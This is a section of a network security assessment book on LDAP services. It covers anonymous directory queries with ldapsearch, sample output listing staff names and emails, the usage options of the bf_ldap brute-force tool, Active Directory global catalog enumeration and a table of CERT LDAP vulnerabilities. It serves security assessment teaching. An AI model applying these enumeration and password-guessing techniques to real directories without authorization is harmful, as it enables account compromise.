5.7 LDAP


The Lightweight Directory Access Protocol (LDAP) service is commonly found running on Windows 2000 Active Directory, Exchange, and Lotus Domino servers. The system provides user directory information to clients. LDAP is highly extensible and widely supported by Apache, MS Exchange, Outlook, Netscape Communicator, and others.

5.7.1 Anonymous LDAP Access

You can query LDAP anonymously (although mileage varies depending on the server configuration) using the ldp.exe utility from the Microsoft Windows 2000 Support Tools Kit found on the Windows 2000 installation CD under the \support\tools\ directory.

The ldapsearch tool is a simple Unix-based alternative to ldp.exe that's bundled with OpenLDAP (http://www.openldap.org). In Example 5-16, I use the tool to perform an anonymous LDAP search against 192.168.0.65 (a Lotus Domino server on Windows 2000).

Example 5-16. Searching the LDAP directory with ldapsearch
# ldapsearch -h 192.168.0.65 < non-relevant results removed for aesthetic purposes > # Nick Baskett, Trustmatta dn: CN=Nick Baskett,O=Trustmatta mail: nick.baskett@trustmatta.com givenname: Nick sn: Baskett cn: Nick Baskett, nick uid: nick maildomain: trustmatta # Andrew Done, Trustmatta\2C andrew dn: CN=Andrew Done,O=Trustmatta\, andrew mail: andrew.done@trustmatta.com givenname: Andrew sn: Done uid: andrew maildomain: trustmatta # James Woodcock, Trustmatta\2C james dn: CN=James Woodcock,O=Trustmatta\, james mail: james.woodcock@trustmatta.com givenname: James sn: Woodcock uid: james maildomain: trustmatta # Jim Chalmers, Trustmatta\2C jim dn: CN=Jim Chalmers,O=Trustmatta\, jim mail: jim.chalmers@trustmatta.com givenname: Jim sn: Chalmers uid: Jim maildomain: trustmatta

5.7.2 LDAP Brute Force

Anonymous access to LDAP has limited use. If LDAP is found running under Windows 2000, an attacker can launch a brute-force, password-guessing attack. The Unix-based bf_ldap tool is useful when performing LDAP brute-force attacks, available from http://www.xfocus.net/exploits.

Here is a list of bf_ldap command-line options:

# bf_ldap Eliel Sardanons <eliel.sardanons@philips.edu.ar> Usage: bf_ldap <parameters> <optional> parameters:         -s server         -d domain name         -u|-U username | users list file name         -L|-l passwords list | length of passwords to generate optional:         -p port (default 389)         -v (verbose mode)         -P Ldap user path (default ,CN=Users,)

Under Windows 2000 and most other environments, valid user account passwords can be compromised using the bf_ldap tool. If you can compromise such a valid LDAP username and password combination, the credentials will usually allow access to other system services (NetBIOS, mail services, etc.).

LDAP services that run as part of Oracle, Groupwise, Exchange, and other server software packages sometimes contain overflow vulnerabilities and other bugs that allow unauthorized access to be gained. I recommend that you check the MITRE CVE list to ensure that an LDAP service found running in a certain configuration isn't vulnerable to attack.

5.7.3 Active Directory Global Catalog

Windows 2000 uses an LDAP-based service called global catalog on TCP port 3268. Global catalog stores a logical representation of all the users, servers and devices within a Windows 2000 Active Directory (AD) infrastructure. Due to the fact that global catalog is an LDAP service, you can use the ldp.exe and ldapsearch utilities (along with a valid username and password combination) to fully enumerate a given active directory, including users, groups, servers, policies, and other information. Just remember to point the utility at port 3268 instead of 389.

5.7.4 LDAP Process Manipulation Vulnerabilities

LDAP services running as part of Oracle, GroupWise, and other server software suites are publicly known to be vulnerable to various simple and complex process manipulation attacks. For current information relating to known LDAP issues, search the MITRE CVE list. The CERT knowledge base at http://www.kb.cert.org/vuls/ lists a number of remotely exploitable LDAP vulnerabilities (not including denial of service or locally exploitable issues), as shown in Table 5-4.

Table 5-4. Remotely exploitable LDAP vulnerabilities

CERT ID

Date

Notes

VU#118277

18/10/2000

Oracle Internet Directory LDAP buffer overflow

VU#583184

16/07/2001

Multiple Lotus Domino R5 Server family LDAP bugs

VU#276944

16/07/2001

Multiple iPlanet Directory Server LDAP bugs

VU#869184

16/07/2001

Multiple Oracle Internet Directory LDAP bugs



Network Security Assessment
Network Security Assessment: Know Your Network
ISBN: 059600611X
EAN: 2147483647
Year: 2006
Pages: 166
Authors: Chris McNab

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net